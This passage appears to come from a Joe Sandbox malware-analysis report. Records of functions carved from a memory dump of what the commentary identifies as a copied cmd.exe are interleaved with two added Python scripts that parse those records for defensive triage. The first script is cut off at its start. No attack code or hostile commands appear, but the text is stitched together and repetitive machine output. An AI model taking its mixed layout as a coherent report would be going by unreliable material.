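• Instruction Fuzzy Hash: F9318271B0021DABDB15DBA9DC85BAEB7E8AF58350F040069A505E3281DB74DE44AB50
APIs
  • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
• fprintf.MSVCRT ref: 00F05182
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: __iob_funcfprintf
• String ID: CMD Internal Error %s$%s$Null environment
• Opcode ID: 957041dcf2f7d1bf391460b771425fdaaf03d08d5d800f993ecaa062dad11938
"""


def parse_records(text):
    """Split report text into one dict per carved function."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                  # every record begins here
            current = {"apis": [], "strings": [], "meta": {}}
            records.append(current)
            section = line
            continue
        if current is None:                 # tail of a record cut off above
            continue
        if line in HEADINGS:
            section = line
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_REF.match(item)
            if m:
                current["apis"].append(m.groupdict())
            continue
        key, _, value = item.partition(": ")
        if key == "Associated":             # drop the page's link label
            current["meta"].setdefault("Associated", []).append(value.removesuffix("Download File"))
        elif key == "String ID":            # '$' separates referenced strings
            current["strings"] = value.split("$")
        else:
            current["meta"][key] = value
    return records


def is_complete(record):
    """True when both hashes needed for a similarity lookup are present."""
    return {"Opcode ID", "Instruction Fuzzy Hash"}.issubset(record["meta"])


def direct_api_calls(records):
    """Count APIs the carved functions call directly (subcalls excluded)."""
    counts = defaultdict(int)
    for r in records:
        for call in r["apis"]:
            if call["caller"] is None:
                counts[f"{call['module']}!{call['api']}"] += 1
    return dict(counts)


def strings_by_dump(records):
    """Collect referenced strings per source memory dump for triage."""
    out = defaultdict(set)
    for r in records:
        out[r["meta"].get("Source File", "").split(",")[0]].update(r["strings"])
    return {dump: sorted(s) for dump, s in out.items()}
```

Grouping strings by source dump is the useful triage view here: every record in this run comes from the same PE-backed region at offset 00EE0000 in process 7, and the strings it references (COPYCMD, "CMD Internal Error %s", "Null environment", Software\Classes) are the messages and variable names of Windows cmd.exe itself, so a reviewer can attribute the whole cluster to a copied command interpreter rather than spend time on each function. Records without an Instruction Fuzzy Hash, such as the truncated one at the end of this excerpt, are kept for their API and string data but excluded from similarity matching by is_complete.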
APIs
  • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
• fprintf.MSVCRT ref: 00F05182
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: __iob_funcfprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 620453056-2781220306
• Opcode ID: 957041dcf2f7d1bf391460b771425fdaaf03d08d5d800f993ecaa062dad11938
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c5b7c1c79b095b7a7aaf94ae08e55db8e7435e7b56c07d234b38ce9630870e3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 957041dcf2f7d1bf391460b771425fdaaf03d08d5d800f993ecaa062dad11938
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC017B37E04B125AC7342B98A80AA63B354DBD0B34365052FEC5BA31C0F6E19D03B950
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00F0351B
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00F0352C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-582119455
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4a19e2dc9e31ee62eff5accf65d0efe0f60407206345ee33292b0e54ba9b40e1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c6a950175a808b9bc2acdb0f2fd1150c2ccd772a8a0aa86b3d7f15764f614d8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a19e2dc9e31ee62eff5accf65d0efe0f60407206345ee33292b0e54ba9b40e1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2E09A32E0133D8BDF31AB35BD0996A3B98AB44F7470A1451F809E33A0D6608D02BED1
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00F038FB
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00F03907
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3625d02a86266f8e9270f5a2ba1e5aef58f332f89b849fa66aee5f2c06aeaab8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c345b872ad5bda5f03419d5cb1e660a615ff75bff1270ec5df5b4cac5a5cb1c7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3625d02a86266f8e9270f5a2ba1e5aef58f332f89b849fa66aee5f2c06aeaab8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0E67294175D778B211FA2DC0DC4B7F19DB447B17005012F90992160CA75C921EE91
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF539E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00EF54C6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$CurrentDirectory
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 168429351-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2e796988c111f9ed8d6fb1ed56332fc7549051a23c4b52260bce34f71e41f0a6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e3eea22e83baf1d1c4743661a9a0ea643ef5b4f144149ce817ac66caef2cb503
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e796988c111f9ed8d6fb1ed56332fc7549051a23c4b52260bce34f71e41f0a6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9619972A0C7459FD328CF28D88566BB7E5FF98310F10492EF69AD7290EB709944DB42
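Records like the ones above are emitted for every function of the image dumped at 0x00EE0000 in process 7, and a report of this size cannot be read by hand. The Python below is an added example, not part of the Joe Sandbox report: it parses the record layout into dicts, lists the APIs a function resolves at run time through a GetModuleHandleW/GetProcAddress pair (here RtlDllShutdownInProgress from ntdll.dll and RaiseFailFastException from kernelbase.dll), and rebases a `ref:` address onto the dump's image base. The embedded sample is abridged from the three records above (Associated lines and most hashes dropped); the splitting rule (every `APIs` header opens a record) and the dict field names are assumptions about the report's layout, not a documented Joe Sandbox format.

```python
"""Parse Joe Sandbox per-function records ('APIs' / 'Memory Dump Source' /
'Joe Sandbox IDA Plugin' / 'Similarity') and extract run-time API resolution."""
import re
from typing import Dict, List, Tuple

# Constructed sample: three records abridged from the report (process 7,
# image base 0x00EE0000). Layout assumptions: one record per 'APIs' header,
# section headers on their own line, items prefixed with a bullet.
SAMPLE = """\
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00F0351B
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00F0352C
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlDllShutdownInProgress$ntdll.dll
• API String ID: 1646373207-582119455
• Instruction Fuzzy Hash: C2E09A32E0133D8BDF31AB35BD0996A3B98AB44F7470A1451F809E33A0D6608D02BED1
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00F038FB
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00F03907
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
APIs
• memset.MSVCRT ref: 00EF539E
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00EF54C6
Similarity
• API ID: memset$CurrentDirectory
• String ID:
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "<api>.<module>(<args>), ref: <va>"; args and the comma are optional, and a
# line may be marked as belonging to a called sub-function.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[^.\s]+)\.(?P<module>[^\s(]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
LOADERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"}


def parse_records(text: str) -> List[Dict]:
    """Split report text into records; each 'APIs' header starts a new one."""
    records: List[Dict] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                records.append({"apis": [], "dump": {}, "similarity": {}})
            section = line
            continue
        if not line.startswith("•") or not records:
            continue
        item, rec = line[1:].strip(), records[-1]
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append({"api": m["api"], "module": m["module"], "ref": int(m["ref"], 16),
                                    "args": m["args"].split(",") if m["args"] else [], "subcall": m["sub"]})
            else:
                rec["apis"].append({"raw": item})  # keep unparseable lines rather than drop them
        elif section == "Memory Dump Source":
            key, _, value = item.partition(": ")
            if key == "Source File":
                rec["dump"]["file"] = value.split(",")[0]
                off = re.search(r"Offset: ([0-9A-F]+)", value)
                rec["dump"]["offset"] = int(off.group(1), 16) if off else None
            else:
                rec["dump"].setdefault("associated", []).append(value)
        elif section == "Joe Sandbox IDA Plugin":
            key, _, value = item.partition(": ")
            rec["dump"][key] = value
        elif section == "Similarity":
            key, _, value = item.partition(":")  # 'String ID:' may have no value
            rec["similarity"][key.strip()] = value.strip()
    return records


def resolved_imports(rec: Dict) -> List[Tuple[str, str]]:
    """Pair each GetProcAddress with the module handle obtained before it."""
    out, module = [], "?"
    for call in rec["apis"]:
        if call.get("subcall"):
            continue  # only count resolution done by this function itself
        if call.get("api") in LOADERS and call["args"]:
            module = call["args"][0]
        elif call.get("api") == "GetProcAddress" and len(call["args"]) >= 2:
            out.append((module, call["args"][1]))
    return out


def rva(rec: Dict, ref: int) -> int:
    """Rebase a 'ref:' virtual address onto the dump's image base."""
    return ref - rec["dump"]["offset"]


def dynamic_api_summary(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """API ID -> run-time resolved (module, function) pairs, empty records dropped."""
    out: Dict[str, List[Tuple[str, str]]] = {}
    for rec in parse_records(text):
        if pairs := resolved_imports(rec):
            out.setdefault(rec["similarity"].get("API ID", "?"), []).extend(pairs)
    return out


if __name__ == "__main__":
    for api_id, pairs in dynamic_api_summary(SAMPLE).items():
        print(api_id, pairs)
```

Two things the output makes visible. The second and third records share the API ID `AddressHandleModuleProc` because that ID is derived from the API names, not their arguments; the String ID is what separates them, so the summary keys by API ID but carries both pairs under it. And run-time resolution of RtlDllShutdownInProgress and RaiseFailFastException is ordinary CRT startup behaviour, which is consistent with the `CMD Internal Error %s` string in the first record and with the report's "Drops or copies cmd.exe with a different name" signature; treat it as a triage pointer to the dumped image, not as evidence of malice on its own.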

APIs
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
• Opcode ID: 8320f656e9f6adc405a21774ec963a1eb3f96b65c3906b6707da1ac90c5397fb
• Instruction ID: 7ee155717781f3a0fb624ad5fa14521b37aa0d033ba865c605b8d98d7b3014d4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8320f656e9f6adc405a21774ec963a1eb3f96b65c3906b6707da1ac90c5397fb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11518E3560065D9BCB24EF798D1167E73A5DF84708B38642DEA43B71C1EBB06E42D391
APIs
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID:
• API String ID: 3849470556-0
• Opcode ID: d2755450ad2af0817215438178f9c888b0841cb87127a3935be5f4c948116aca
• Instruction ID: e91c6497d577cf5a4ea28c6d95bd109101e186ab4b69f255b2750fee9fe788c2
• Opcode Fuzzy Hash: d2755450ad2af0817215438178f9c888b0841cb87127a3935be5f4c948116aca
• Instruction Fuzzy Hash: A0511670A0824CCBCB24DF5ADC452BDB7B1FB84304F2551AAE902A7391E7B5DD42EB81
APIs
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePath
• String ID:
• API String ID: 268959451-0
• Opcode ID: 105cbef846006cf02cde67ae9e4c7cf29f52b92e2ace2c8029c8f3f8c5f510d6
• Instruction ID: 26c26e31dbfa5789fa7ffa6f0677ffca467395647ba22444765d67a27e97b068
• Opcode Fuzzy Hash: 105cbef846006cf02cde67ae9e4c7cf29f52b92e2ace2c8029c8f3f8c5f510d6
• Instruction Fuzzy Hash: C7313A3910020DEBCB28DF68C8559BBB3B5EF84304769855DEB06E7250EBB1AE41C750
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EEC5BD
• RtlFreeHeap.NTDLL ref: 00EEC5C4
• _setjmp3.MSVCRT ref: 00EEC630
• VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00EEC69D
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: FreeHeap$ProcessVirtual_setjmp3
• String ID:
• API String ID: 2613391085-0
• Opcode ID: 88626bec04334ad911815d271a4c5d7582829882f0e086e8d61d452c5ed1fb49
• Instruction ID: e271a36c833992f8a4b9f1b5eabc348fc0759f368d59dfad34aa3083482d3a12
• Opcode Fuzzy Hash: 88626bec04334ad911815d271a4c5d7582829882f0e086e8d61d452c5ed1fb49
• Instruction Fuzzy Hash: C331D271A0424D8BDB10DF79EC447AA7BF5F744708F26A029E809E7390EB749C46EB91
APIs
• longjmp.MSVCRT(00F20A30,00000001,?,?,00EFBFD6,?,?,?,?,?,?,?,?), ref: 00F064D4
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
  • Part of subcall function 00EF72EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00EE1028,?,?,?,00EFF12E,00F0CA50,00000018,00EF1E7C,00000000,00000000,00EFACE0,00000000,00000000,?,00000104,?), ref: 00EF7314
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F0646C
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F06474
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00EFBFD6), ref: 00F064B6
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 129137517-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: eb797040ecb9df6ed1a9a9e04fc8c2928c856bc3c989596a4c173f91fd74a984
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6280ad059a46352507b5f962c6c41eeeb383cb1f61c72bc1ae26c4bd3916f299
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb797040ecb9df6ed1a9a9e04fc8c2928c856bc3c989596a4c173f91fd74a984
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9521387AA00209ABC724FF748C5597F779ADF843607184518F906E72D1EE749D16F2A0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2977
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2987
                                                                                                                                                                                                                                                                                                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00EEE559,?,?,00000000,?), ref: 00EF29FF
                                                                                                                                                                                                                                                                                                                                                      • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00EEE559,?,?,00000000,?), ref: 00EF2A09
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4273384694-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 959b0c025626c7761d1a88286ac9354e97add0400e8ab0051a501abf5ce72823
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0a9d194fd42eb5c3afb94ea43eaefaf691f71f4b7db91404ff47aae1d7778bbf
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 959b0c025626c7761d1a88286ac9354e97add0400e8ab0051a501abf5ce72823
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D511E43280051EBB87225F788D08DBABA68FF81358B15121CEB01FB550D3A9ED50E6F4
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C56B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00F0C5A5
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0C5BD
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 00F0C5DA
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
